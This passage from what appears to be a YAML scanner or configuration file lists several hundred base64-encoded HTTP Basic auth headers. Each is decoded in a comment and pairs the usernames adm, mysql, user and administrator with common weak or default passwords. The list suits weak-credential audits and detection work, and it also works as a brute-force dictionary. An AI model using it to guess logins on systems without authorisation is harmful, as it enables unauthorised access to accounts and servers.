1008 | - "BASIC YWRtOnBAc3N3b3Jk" #adm:p@ssword
1009 | - "BASIC YWRtOnBhNTV3MHJk" #adm:pa55w0rd
1010 | - "BASIC YWRtOnBhc3M=" #adm:pass
1011 | - "BASIC YWRtOnBhc3N3MHJk" #adm:passw0rd
1012 | - "BASIC YWRtOnBhc3N3b3Jk" #adm:password
1013 | - "BASIC YWRtOnBhc3N3b3JkMTIz" #adm:password123
1014 | - "BASIC YWRtOnExdzJlMw==" #adm:q1w2e3
1015 | - "BASIC YWRtOnExdzJlM3I0" #adm:q1w2e3r4
1016 | - "BASIC YWRtOnExdzJlM3I0dDU=" #adm:q1w2e3r4t5
1017 | - "BASIC YWRtOnFhendzeGVkYw==" #adm:qazwsxedc
1018 | - "BASIC YWRtOnF3ZTEyMw==" #adm:qwe123
1019 | - "BASIC YWRtOnF3ZXIxMjM0" #adm:qwer1234
1020 | - "BASIC YWRtOnF3ZXJ0eQ==" #adm:qwerty
1021 | - "BASIC YWRtOnF3ZXJ0eTEyMw==" #adm:qwerty123
1022 | - "BASIC YWRtOnJlZGhhdA==" #adm:redhat
1023 | - "BASIC YWRtOnJvb3Q=" #adm:root
1024 | - "BASIC YWRtOnJvb3QxMjM=" #adm:root123
1025 | - "BASIC YWRtOnJvb3QxMjM0" #adm:root1234
1026 | - "BASIC YWRtOnJvb3RAMTIz" #adm:root@123
1027 | - "BASIC YWRtOnJvb3Ryb290" #adm:rootroot
1028 | - "BASIC YWRtOnNlcnZlcg==" #adm:server
1029 | - "BASIC YWRtOnN1cGVydXNlcg==" #adm:superuser
1030 | - "BASIC YWRtOnN5c3RlbQ==" #adm:system
1031 | - "BASIC YWRtOlRlc3Q=" #adm:Test
1032 | - "BASIC YWRtOnRlc3Q=" #adm:test
1033 | - "BASIC YWRtOnRlc3QxMjM=" #adm:test123
1034 | - "BASIC YWRtOnRvb3I=" #adm:toor
1035 | - "BASIC YWRtOnVibnQ=" #adm:ubnt
1036 | - "BASIC YWRtOnVidW50dQ==" #adm:ubuntu
1037 | - "BASIC YWRtOlVzZXI=" #adm:User
1038 | - "BASIC YWRtOnVzZXI=" #adm:user
1039 | - "BASIC YWRtOnZtd2FyZQ==" #adm:vmware
1040 | - "BASIC YWRtOndlbGNvbWU=" #adm:welcome
1041 | - "BASIC YWRtOnd1YmFv" #adm:wubao
1042 | - "BASIC YWRtOnphcTEyd3N4" #adm:zaq12wsx
1043 | - "BASIC YWRtOnp4Y3Zibg==" #adm:zxcvbn
1044 | - "BASIC YWRtOnp4Y3Zibm0=" #adm:zxcvbnm
1045 | - "BASIC YWRtOmNoYW5nZWl0" #adm:changeit
1046 | - "BASIC bXlzcWw6" #mysql:
1047 | - "BASIC bXlzcWw6IVFBWjJ3c3g=" #mysql:!QAZ2wsx
1048 | - "BASIC bXlzcWw6IXFhekB3c3g=" #mysql:!qaz@wsx
1049 | - "BASIC bXlzcWw6MDAwMA==" #mysql:0000
1050 | - "BASIC bXlzcWw6MDAwMDAw" #mysql:000000
1051 | - "BASIC bXlzcWw6MDAwMDAwMA==" #mysql:0000000
1052 | - "BASIC bXlzcWw6MDAwMDAwMDA=" #mysql:00000000
1053 | - "BASIC bXlzcWw6MDk4NzY1NDMyMQ==" #mysql:0987654321
1054 | - "BASIC bXlzcWw6MA==" #mysql:0
1055 | - "BASIC bXlzcWw6MQ==" #mysql:1
1056 | - "BASIC bXlzcWw6Mg==" #mysql:2
1057 | - "BASIC bXlzcWw6Mw==" #mysql:3
1058 | - "BASIC bXlzcWw6NA==" #mysql:4
1059 | - "BASIC bXlzcWw6NQ==" #mysql:5
1060 | - "BASIC bXlzcWw6Ng==" #mysql:6
1061 | - "BASIC bXlzcWw6Nw==" #mysql:7
1062 | - "BASIC bXlzcWw6OA==" #mysql:8
1063 | - "BASIC bXlzcWw6OQ==" #mysql:9
1064 | - "BASIC bXlzcWw6MTExMQ==" #mysql:1111
1065 | - "BASIC bXlzcWw6MTExMTE=" #mysql:11111
1066 | - "BASIC bXlzcWw6MTExMTEx" #mysql:111111
1067 | - "BASIC bXlzcWw6MTExMTExMQ==" #mysql:1111111
1068 | - "BASIC bXlzcWw6MTExMTExMTE=" #mysql:11111111
1069 | - "BASIC bXlzcWw6MTEyMjMz" #mysql:112233
1070 | - "BASIC bXlzcWw6MTIxMjEy" #mysql:121212
1071 | - "BASIC bXlzcWw6MTIz" #mysql:123
1072 | - "BASIC bXlzcWw6MTIzMTIz" #mysql:123123
1073 | - "BASIC bXlzcWw6MTIzMzIx" #mysql:123321
1074 | - "BASIC bXlzcWw6MTIzNA==" #mysql:1234
1075 | - "BASIC bXlzcWw6MTIzNDU=" #mysql:12345
1076 | - "BASIC bXlzcWw6MTIzNDU2" #mysql:123456
1077 | - "BASIC bXlzcWw6MTIzNDU2Nw==" #mysql:1234567
1078 | - "BASIC bXlzcWw6MTIzNDU2Nzg=" #mysql:12345678
1079 | - "BASIC bXlzcWw6MTIzNDU2Nzg5" #mysql:123456789
1080 | - "BASIC bXlzcWw6MTIzNDU2Nzg5MA==" #mysql:1234567890
1081 | - "BASIC bXlzcWw6MTIzNGFiY2Q=" #mysql:1234abcd
1082 | - "BASIC bXlzcWw6MTIzNHF3ZXI=" #mysql:1234qwer
1083 | - "BASIC bXlzcWw6MTIzYWJj" #mysql:123abc
1084 | - "BASIC bXlzcWw6MTIzYXNk" #mysql:123asd
1085 | - "BASIC bXlzcWw6MTIzcXdl" #mysql:123qwe
1086 | - "BASIC bXlzcWw6MTIzcXdlYXNk" #mysql:123qweasd
1087 | - "BASIC bXlzcWw6MTJxd2Fzeng=" #mysql:12qwaszx
1088 | - "BASIC bXlzcWw6MWUyZTNl" #mysql:1e2e3e
1089 | - "BASIC bXlzcWw6MWUyZTNlNGU=" #mysql:1e2e3e4e
1090 | - "BASIC bXlzcWw6MXEycTNx" #mysql:1q2q3q
1091 | - "BASIC bXlzcWw6MXEycTNxNHE=" #mysql:1q2q3q4q
1092 | - "BASIC bXlzcWw6MXEydzNl" #mysql:1q2w3e
1093 | - "BASIC bXlzcWw6MXEydzNlNHI=" #mysql:1q2w3e4r
1094 | - "BASIC bXlzcWw6MXEydzNlNHI1dA==" #mysql:1q2w3e4r5t
1095 | - "BASIC bXlzcWw6MXFhejJ3c3g=" #mysql:1qaz2wsx
1096 | - "BASIC bXlzcWw6MXFhejJ3c3gzZWRj" #mysql:1qaz2wsx3edc
1097 | - "BASIC bXlzcWw6MXFhenhzdzI=" #mysql:1qazxsw2
1098 | - "BASIC bXlzcWw6MXFhelhTV0A=" #mysql:1qazXSW@
1099 | - "BASIC bXlzcWw6MXcycSFXQFE=" #mysql:1w2q!W@Q
1100 | - "BASIC bXlzcWw6MXcydzN3" #mysql:1w2w3w
1101 | - "BASIC bXlzcWw6MXcydzN3NHc=" #mysql:1w2w3w4w
1102 | - "BASIC bXlzcWw6NTQzMjE=" #mysql:54321
1103 | - "BASIC bXlzcWw6NjU0MzIx" #mysql:654321
1104 | - "BASIC bXlzcWw6ODg4ODg4" #mysql:888888
1105 | - "BASIC bXlzcWw6YQ==" #mysql:a
1106 | - "BASIC bXlzcWw6YWJjMTIz" #mysql:abc123
1107 | - "BASIC bXlzcWw6YWJjZDEyMzQ=" #mysql:abcd1234
1108 | - "BASIC bXlzcWw6QWRtaW4=" #mysql:Admin
1109 | - "BASIC bXlzcWw6YWRtaW4=" #mysql:admin
1110 | - "BASIC bXlzcWw6YWRtaW4hQA==" #mysql:admin!@
1111 | - "BASIC bXlzcWw6YWRtaW4x" #mysql:admin1
1112 | - "BASIC bXlzcWw6YWRtaW4xMg==" #mysql:admin12
1113 | - "BASIC bXlzcWw6YWRtaW4xMjM=" #mysql:admin123
1114 | - "BASIC bXlzcWw6YWRtaW4xMjM0NTY=" #mysql:admin123456
1115 | - "BASIC bXlzcWw6YWRtaW5pc3RyYXRvcg==" #mysql:administrator
1116 | - "BASIC bXlzcWw6YWxwaW5l" #mysql:alpine
1117 | - "BASIC bXlzcWw6YXNkMTIz" #mysql:asd123
1118 | - "BASIC bXlzcWw6YXNkZg==" #mysql:asdf
1119 | - "BASIC bXlzcWw6YXNkZjEyMzQ=" #mysql:asdf1234
1120 | - "BASIC bXlzcWw6YXNkZmdo" #mysql:asdfgh
1121 | - "BASIC bXlzcWw6Y2VudG9z" #mysql:centos
1122 | - "BASIC bXlzcWw6Y2hhbmdlbWU=" #mysql:changeme
1123 | - "BASIC bXlzcWw6Y2lzY28=" #mysql:cisco
1124 | - "BASIC bXlzcWw6Y2lzY28xMjM=" #mysql:cisco123
1125 | - "BASIC bXlzcWw6ZGVmYXVsdA==" #mysql:default
1126 | - "BASIC bXlzcWw6aWRjIUA=" #mysql:idc!@
1127 | - "BASIC bXlzcWw6amlhbWltYQ==" #mysql:jiamima
1128 | - "BASIC bXlzcWw6bGV0bWVpbg==" #mysql:letmein
1129 | - "BASIC bXlzcWw6bGludXg=" #mysql:linux
1130 | - "BASIC bXlzcWw6bWFuYWdlcg==" #mysql:manager
1131 | - "BASIC bXlzcWw6bWFzdGVy" #mysql:master
1132 | - "BASIC bXlzcWw6b3JhY2xl" #mysql:oracle
1133 | - "BASIC bXlzcWw6cEAkJHcwcmQ=" #mysql:p@$$w0rd
1134 | - "BASIC bXlzcWw6UEBzc3cwcmQ=" #mysql:P@ssw0rd
1135 | - "BASIC bXlzcWw6cEBzc3cwcmQ=" #mysql:p@ssw0rd
1136 | - "BASIC bXlzcWw6UEBzc3cwcmQh" #mysql:P@ssw0rd!
1137 | - "BASIC bXlzcWw6cEBzc3dvcmQ=" #mysql:p@ssword
1138 | - "BASIC bXlzcWw6cGE1NXcwcmQ=" #mysql:pa55w0rd
1139 | - "BASIC bXlzcWw6cGFzcw==" #mysql:pass
1140 | - "BASIC bXlzcWw6cGFzc3cwcmQ=" #mysql:passw0rd
1141 | - "BASIC bXlzcWw6cGFzc3dvcmQ=" #mysql:password
1142 | - "BASIC bXlzcWw6cGFzc3dvcmQxMjM=" #mysql:password123
1143 | - "BASIC bXlzcWw6cTF3MmUz" #mysql:q1w2e3
1144 | - "BASIC bXlzcWw6cTF3MmUzcjQ=" #mysql:q1w2e3r4
1145 | - "BASIC bXlzcWw6cTF3MmUzcjR0NQ==" #mysql:q1w2e3r4t5
1146 | - "BASIC bXlzcWw6cWF6d3N4ZWRj" #mysql:qazwsxedc
1147 | - "BASIC bXlzcWw6cXdlMTIz" #mysql:qwe123
1148 | - "BASIC bXlzcWw6cXdlcjEyMzQ=" #mysql:qwer1234
1149 | - "BASIC bXlzcWw6cXdlcnR5" #mysql:qwerty
1150 | - "BASIC bXlzcWw6cXdlcnR5MTIz" #mysql:qwerty123
1151 | - "BASIC bXlzcWw6cmVkaGF0" #mysql:redhat
1152 | - "BASIC bXlzcWw6cm9vdA==" #mysql:root
1153 | - "BASIC bXlzcWw6cm9vdDEyMw==" #mysql:root123
1154 | - "BASIC bXlzcWw6cm9vdDEyMzQ=" #mysql:root1234
1155 | - "BASIC bXlzcWw6cm9vdEAxMjM=" #mysql:root@123
1156 | - "BASIC bXlzcWw6cm9vdHJvb3Q=" #mysql:rootroot
1157 | - "BASIC bXlzcWw6c2VydmVy" #mysql:server
1158 | - "BASIC bXlzcWw6c3VwZXJ1c2Vy" #mysql:superuser
1159 | - "BASIC bXlzcWw6c3lzdGVt" #mysql:system
1160 | - "BASIC bXlzcWw6VGVzdA==" #mysql:Test
1161 | - "BASIC bXlzcWw6dGVzdA==" #mysql:test
1162 | - "BASIC bXlzcWw6dGVzdDEyMw==" #mysql:test123
1163 | - "BASIC bXlzcWw6dG9vcg==" #mysql:toor
1164 | - "BASIC bXlzcWw6dWJudA==" #mysql:ubnt
1165 | - "BASIC bXlzcWw6dWJ1bnR1" #mysql:ubuntu
1166 | - "BASIC bXlzcWw6VXNlcg==" #mysql:User
1167 | - "BASIC bXlzcWw6dXNlcg==" #mysql:user
1168 | - "BASIC bXlzcWw6dm13YXJl" #mysql:vmware
1169 | - "BASIC bXlzcWw6d2VsY29tZQ==" #mysql:welcome
1170 | - "BASIC bXlzcWw6d3ViYW8=" #mysql:wubao
1171 | - "BASIC bXlzcWw6emFxMTJ3c3g=" #mysql:zaq12wsx
1172 | - "BASIC bXlzcWw6enhjdmJu" #mysql:zxcvbn
1173 | - "BASIC bXlzcWw6enhjdmJubQ==" #mysql:zxcvbnm
1174 | - "BASIC bXlzcWw6Y2hhbmdlaXQ=" #mysql:changeit
1175 | - "BASIC dXNlcjo=" #user:
1176 | - "BASIC dXNlcjohUUFaMndzeA==" #user:!QAZ2wsx
1177 | - "BASIC dXNlcjohcWF6QHdzeA==" #user:!qaz@wsx
1178 | - "BASIC dXNlcjowMDAw" #user:0000
1179 | - "BASIC dXNlcjowMDAwMDA=" #user:000000
1180 | - "BASIC dXNlcjowMDAwMDAw" #user:0000000
1181 | - "BASIC dXNlcjowMDAwMDAwMA==" #user:00000000
1182 | - "BASIC dXNlcjowOTg3NjU0MzIx" #user:0987654321
1183 | - "BASIC dXNlcjow" #user:0
1184 | - "BASIC dXNlcjox" #user:1
1185 | - "BASIC dXNlcjoy" #user:2
1186 | - "BASIC dXNlcjoz" #user:3
1187 | - "BASIC dXNlcjo0" #user:4
1188 | - "BASIC dXNlcjo1" #user:5
1189 | - "BASIC dXNlcjo2" #user:6
1190 | - "BASIC dXNlcjo3" #user:7
1191 | - "BASIC dXNlcjo4" #user:8
1192 | - "BASIC dXNlcjo5" #user:9
1193 | - "BASIC dXNlcjoxMTEx" #user:1111
1194 | - "BASIC dXNlcjoxMTExMQ==" #user:11111
1195 | - "BASIC dXNlcjoxMTExMTE=" #user:111111
1196 | - "BASIC dXNlcjoxMTExMTEx" #user:1111111
1197 | - "BASIC dXNlcjoxMTExMTExMQ==" #user:11111111
1198 | - "BASIC dXNlcjoxMTIyMzM=" #user:112233
1199 | - "BASIC dXNlcjoxMjEyMTI=" #user:121212
1200 | - "BASIC dXNlcjoxMjM=" #user:123
1201 | - "BASIC dXNlcjoxMjMxMjM=" #user:123123
1202 | - "BASIC dXNlcjoxMjMzMjE=" #user:123321
1203 | - "BASIC dXNlcjoxMjM0" #user:1234
1204 | - "BASIC dXNlcjoxMjM0NQ==" #user:12345
1205 | - "BASIC dXNlcjoxMjM0NTY=" #user:123456
1206 | - "BASIC dXNlcjoxMjM0NTY3" #user:1234567
1207 | - "BASIC dXNlcjoxMjM0NTY3OA==" #user:12345678
1208 | - "BASIC dXNlcjoxMjM0NTY3ODk=" #user:123456789
1209 | - "BASIC dXNlcjoxMjM0NTY3ODkw" #user:1234567890
1210 | - "BASIC dXNlcjoxMjM0YWJjZA==" #user:1234abcd
1211 | - "BASIC dXNlcjoxMjM0cXdlcg==" #user:1234qwer
1212 | - "BASIC dXNlcjoxMjNhYmM=" #user:123abc
1213 | - "BASIC dXNlcjoxMjNhc2Q=" #user:123asd
1214 | - "BASIC dXNlcjoxMjNxd2U=" #user:123qwe
1215 | - "BASIC dXNlcjoxMjNxd2Vhc2Q=" #user:123qweasd
1216 | - "BASIC dXNlcjoxMnF3YXN6eA==" #user:12qwaszx
1217 | - "BASIC dXNlcjoxZTJlM2U=" #user:1e2e3e
1218 | - "BASIC dXNlcjoxZTJlM2U0ZQ==" #user:1e2e3e4e
1219 | - "BASIC dXNlcjoxcTJxM3E=" #user:1q2q3q
1220 | - "BASIC dXNlcjoxcTJxM3E0cQ==" #user:1q2q3q4q
1221 | - "BASIC dXNlcjoxcTJ3M2U=" #user:1q2w3e
1222 | - "BASIC dXNlcjoxcTJ3M2U0cg==" #user:1q2w3e4r
1223 | - "BASIC dXNlcjoxcTJ3M2U0cjV0" #user:1q2w3e4r5t
1224 | - "BASIC dXNlcjoxcWF6MndzeA==" #user:1qaz2wsx
1225 | - "BASIC dXNlcjoxcWF6MndzeDNlZGM=" #user:1qaz2wsx3edc
1226 | - "BASIC dXNlcjoxcWF6eHN3Mg==" #user:1qazxsw2
1227 | - "BASIC dXNlcjoxcWF6WFNXQA==" #user:1qazXSW@
1228 | - "BASIC dXNlcjoxdzJxIVdAUQ==" #user:1w2q!W@Q
1229 | - "BASIC dXNlcjoxdzJ3M3c=" #user:1w2w3w
1230 | - "BASIC dXNlcjoxdzJ3M3c0dw==" #user:1w2w3w4w
1231 | - "BASIC dXNlcjo1NDMyMQ==" #user:54321
1232 | - "BASIC dXNlcjo2NTQzMjE=" #user:654321
1233 | - "BASIC dXNlcjo4ODg4ODg=" #user:888888
1234 | - "BASIC dXNlcjph" #user:a
1235 | - "BASIC dXNlcjphYmMxMjM=" #user:abc123
1236 | - "BASIC dXNlcjphYmNkMTIzNA==" #user:abcd1234
1237 | - "BASIC dXNlcjpBZG1pbg==" #user:Admin
1238 | - "BASIC dXNlcjphZG1pbg==" #user:admin
1239 | - "BASIC dXNlcjphZG1pbiFA" #user:admin!@
1240 | - "BASIC dXNlcjphZG1pbjE=" #user:admin1
1241 | - "BASIC dXNlcjphZG1pbjEy" #user:admin12
1242 | - "BASIC dXNlcjphZG1pbjEyMw==" #user:admin123
1243 | - "BASIC dXNlcjphZG1pbjEyMzQ1Ng==" #user:admin123456
1244 | - "BASIC dXNlcjphZG1pbmlzdHJhdG9y" #user:administrator
1245 | - "BASIC dXNlcjphbHBpbmU=" #user:alpine
1246 | - "BASIC dXNlcjphc2QxMjM=" #user:asd123
1247 | - "BASIC dXNlcjphc2Rm" #user:asdf
1248 | - "BASIC dXNlcjphc2RmMTIzNA==" #user:asdf1234
1249 | - "BASIC dXNlcjphc2RmZ2g=" #user:asdfgh
1250 | - "BASIC dXNlcjpjZW50b3M=" #user:centos
1251 | - "BASIC dXNlcjpjaGFuZ2VtZQ==" #user:changeme
1252 | - "BASIC dXNlcjpjaXNjbw==" #user:cisco
1253 | - "BASIC dXNlcjpjaXNjbzEyMw==" #user:cisco123
1254 | - "BASIC dXNlcjpkZWZhdWx0" #user:default
1255 | - "BASIC dXNlcjppZGMhQA==" #user:idc!@
1256 | - "BASIC dXNlcjpqaWFtaW1h" #user:jiamima
1257 | - "BASIC dXNlcjpsZXRtZWlu" #user:letmein
1258 | - "BASIC dXNlcjpsaW51eA==" #user:linux
1259 | - "BASIC dXNlcjptYW5hZ2Vy" #user:manager
1260 | - "BASIC dXNlcjptYXN0ZXI=" #user:master
1261 | - "BASIC dXNlcjpvcmFjbGU=" #user:oracle
1262 | - "BASIC dXNlcjpwQCQkdzByZA==" #user:p@$$w0rd
1263 | - "BASIC dXNlcjpQQHNzdzByZA==" #user:P@ssw0rd
1264 | - "BASIC dXNlcjpwQHNzdzByZA==" #user:p@ssw0rd
1265 | - "BASIC dXNlcjpQQHNzdzByZCE=" #user:P@ssw0rd!
1266 | - "BASIC dXNlcjpwQHNzd29yZA==" #user:p@ssword
1267 | - "BASIC dXNlcjpwYTU1dzByZA==" #user:pa55w0rd
1268 | - "BASIC dXNlcjpwYXNz" #user:pass
1269 | - "BASIC dXNlcjpwYXNzdzByZA==" #user:passw0rd
1270 | - "BASIC dXNlcjpwYXNzd29yZA==" #user:password
1271 | - "BASIC dXNlcjpwYXNzd29yZDEyMw==" #user:password123
1272 | - "BASIC dXNlcjpxMXcyZTM=" #user:q1w2e3
1273 | - "BASIC dXNlcjpxMXcyZTNyNA==" #user:q1w2e3r4
1274 | - "BASIC dXNlcjpxMXcyZTNyNHQ1" #user:q1w2e3r4t5
1275 | - "BASIC dXNlcjpxYXp3c3hlZGM=" #user:qazwsxedc
1276 | - "BASIC dXNlcjpxd2UxMjM=" #user:qwe123
1277 | - "BASIC dXNlcjpxd2VyMTIzNA==" #user:qwer1234
1278 | - "BASIC dXNlcjpxd2VydHk=" #user:qwerty
1279 | - "BASIC dXNlcjpxd2VydHkxMjM=" #user:qwerty123
1280 | - "BASIC dXNlcjpyZWRoYXQ=" #user:redhat
1281 | - "BASIC dXNlcjpyb290" #user:root
1282 | - "BASIC dXNlcjpyb290MTIz" #user:root123
1283 | - "BASIC dXNlcjpyb290MTIzNA==" #user:root1234
1284 | - "BASIC dXNlcjpyb290QDEyMw==" #user:root@123
1285 | - "BASIC dXNlcjpyb290cm9vdA==" #user:rootroot
1286 | - "BASIC dXNlcjpzZXJ2ZXI=" #user:server
1287 | - "BASIC dXNlcjpzdXBlcnVzZXI=" #user:superuser
1288 | - "BASIC dXNlcjpzeXN0ZW0=" #user:system
1289 | - "BASIC dXNlcjpUZXN0" #user:Test
1290 | - "BASIC dXNlcjp0ZXN0" #user:test
1291 | - "BASIC dXNlcjp0ZXN0MTIz" #user:test123
1292 | - "BASIC dXNlcjp0b29y" #user:toor
1293 | - "BASIC dXNlcjp1Ym50" #user:ubnt
1294 | - "BASIC dXNlcjp1YnVudHU=" #user:ubuntu
1295 | - "BASIC dXNlcjpVc2Vy" #user:User
1296 | - "BASIC dXNlcjp1c2Vy" #user:user
1297 | - "BASIC dXNlcjp2bXdhcmU=" #user:vmware
1298 | - "BASIC dXNlcjp3ZWxjb21l" #user:welcome
1299 | - "BASIC dXNlcjp3dWJhbw==" #user:wubao
1300 | - "BASIC dXNlcjp6YXExMndzeA==" #user:zaq12wsx
1301 | - "BASIC dXNlcjp6eGN2Ym4=" #user:zxcvbn
1302 | - "BASIC dXNlcjp6eGN2Ym5t" #user:zxcvbnm
1303 | - "BASIC dXNlcjpjaGFuZ2VpdA==" #user:changeit
1304 | - "BASIC YWRtaW5pc3RyYXRvcjo=" #administrator:
1305 | - "BASIC YWRtaW5pc3RyYXRvcjohUUFaMndzeA==" #administrator:!QAZ2wsx
1306 | - "BASIC YWRtaW5pc3RyYXRvcjohcWF6QHdzeA==" #administrator:!qaz@wsx
1307 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAw" #administrator:0000
1308 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAwMDA=" #administrator:000000
1309 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAwMDAw" #administrator:0000000
1310 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAwMDAwMA==" #administrator:00000000
1311 | - "BASIC YWRtaW5pc3RyYXRvcjowOTg3NjU0MzIx" #administrator:0987654321
1312 | - "BASIC YWRtaW5pc3RyYXRvcjow" #administrator:0
1313 | - "BASIC YWRtaW5pc3RyYXRvcjox" #administrator:1
1314 | - "BASIC YWRtaW5pc3RyYXRvcjoy" #administrator:2
1315 | - "BASIC YWRtaW5pc3RyYXRvcjoz" #administrator:3
1316 | - "BASIC YWRtaW5pc3RyYXRvcjo0" #administrator:4
1317 | - "BASIC YWRtaW5pc3RyYXRvcjo1" #administrator:5
1318 | - "BASIC YWRtaW5pc3RyYXRvcjo2" #administrator:6
1319 | - "BASIC YWRtaW5pc3RyYXRvcjo3" #administrator:7
1320 | - "BASIC YWRtaW5pc3RyYXRvcjo4" #administrator:8
1321 | - "BASIC YWRtaW5pc3RyYXRvcjo5" #administrator:9
1322 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTEx" #administrator:1111
1323 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMQ==" #administrator:11111
1324 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMTE=" #administrator:111111
1325 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMTEx" #administrator:1111111
1326 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMTExMQ==" #administrator:11111111
1327 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTIyMzM=" #administrator:112233
1328 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjEyMTI=" #administrator:121212
1329 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM=" #administrator:123
1330 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjMxMjM=" #administrator:123123
1331 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjMzMjE=" #administrator:123321
1332 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0" #administrator:1234
1333 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NQ==" #administrator:12345
1334 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY=" #administrator:123456
1335 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3" #administrator:1234567
1336 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3OA==" #administrator:12345678
1337 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3ODk=" #administrator:123456789
1338 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3ODkw" #administrator:1234567890
1339 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0YWJjZA==" #administrator:1234abcd
1340 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0cXdlcg==" #administrator:1234qwer
1341 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNhYmM=" #administrator:123abc
1342 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNhc2Q=" #administrator:123asd
1343 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNxd2U=" #administrator:123qwe
1344 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNxd2Vhc2Q=" #administrator:123qweasd
1345 | - "BASIC YWRtaW5pc3RyYXRvcjoxMnF3YXN6eA==" #administrator:12qwaszx
1346 | - "BASIC YWRtaW5pc3RyYXRvcjoxZTJlM2U=" #administrator:1e2e3e
1347 | - "BASIC YWRtaW5pc3RyYXRvcjoxZTJlM2U0ZQ==" #administrator:1e2e3e4e
1348 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJxM3E=" #administrator:1q2q3q
1349 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJxM3E0cQ==" #administrator:1q2q3q4q
1350 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJ3M2U=" #administrator:1q2w3e
1351 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJ3M2U0cg==" #administrator:1q2w3e4r
1352 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJ3M2U0cjV0" #administrator:1q2w3e4r5t
1353 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6MndzeA==" #administrator:1qaz2wsx
1354 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6MndzeDNlZGM=" #administrator:1qaz2wsx3edc
1355 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6eHN3Mg==" #administrator:1qazxsw2
1356 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6WFNXQA==" #administrator:1qazXSW@
1357 | - "BASIC YWRtaW5pc3RyYXRvcjoxdzJxIVdAUQ==" #administrator:1w2q!W@Q
1358 | - "BASIC YWRtaW5pc3RyYXRvcjoxdzJ3M3c=" #administrator:1w2w3w
1359 | - "BASIC YWRtaW5pc3RyYXRvcjoxdzJ3M3c0dw==" #administrator:1w2w3w4w
1360 | - "BASIC YWRtaW5pc3RyYXRvcjo1NDMyMQ==" #administrator:54321
1361 | - "BASIC YWRtaW5pc3RyYXRvcjo2NTQzMjE=" #administrator:654321
1362 | - "BASIC YWRtaW5pc3RyYXRvcjo4ODg4ODg=" #administrator:888888
1363 | - "BASIC YWRtaW5pc3RyYXRvcjph" #administrator:a
1364 | - "BASIC YWRtaW5pc3RyYXRvcjphYmMxMjM=" #administrator:abc123
1365 | - "BASIC YWRtaW5pc3RyYXRvcjphYmNkMTIzNA==" #administrator:abcd1234
1366 | - "BASIC YWRtaW5pc3RyYXRvcjpBZG1pbg==" #administrator:Admin
1367 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbg==" #administrator:admin
1368 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbiFA" #administrator:admin!@
1369 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjE=" #administrator:admin1
1370 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjEy" #administrator:admin12
1371 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjEyMw==" #administrator:admin123
1372 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjEyMzQ1Ng==" #administrator:admin123456
1373 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbmlzdHJhdG9y" #administrator:administrator
1374 | - "BASIC YWRtaW5pc3RyYXRvcjphbHBpbmU=" #administrator:alpine
1375 | - "BASIC YWRtaW5pc3RyYXRvcjphc2QxMjM=" #administrator:asd123
1376 | - "BASIC YWRtaW5pc3RyYXRvcjphc2Rm" #administrator:asdf
1377 | - "BASIC YWRtaW5pc3RyYXRvcjphc2RmMTIzNA==" #administrator:asdf1234
1378 | - "BASIC YWRtaW5pc3RyYXRvcjphc2RmZ2g=" #administrator:asdfgh
1379 | - "BASIC YWRtaW5pc3RyYXRvcjpjZW50b3M=" #administrator:centos
1380 | - "BASIC YWRtaW5pc3RyYXRvcjpjaGFuZ2VtZQ==" #administrator:changeme
1381 | - "BASIC YWRtaW5pc3RyYXRvcjpjaXNjbw==" #administrator:cisco
1382 | - "BASIC YWRtaW5pc3RyYXRvcjpjaXNjbzEyMw==" #administrator:cisco123
1383 | - "BASIC YWRtaW5pc3RyYXRvcjpkZWZhdWx0" #administrator:default
1384 | - "BASIC YWRtaW5pc3RyYXRvcjppZGMhQA==" #administrator:idc!@
1385 | - "BASIC YWRtaW5pc3RyYXRvcjpqaWFtaW1h" #administrator:jiamima
1386 | - "BASIC YWRtaW5pc3RyYXRvcjpsZXRtZWlu" #administrator:letmein
1387 | - "BASIC YWRtaW5pc3RyYXRvcjpsaW51eA==" #administrator:linux
1388 | - "BASIC YWRtaW5pc3RyYXRvcjptYW5hZ2Vy" #administrator:manager
1389 | - "BASIC YWRtaW5pc3RyYXRvcjptYXN0ZXI=" #administrator:master
1390 | - "BASIC YWRtaW5pc3RyYXRvcjpvcmFjbGU=" #administrator:oracle
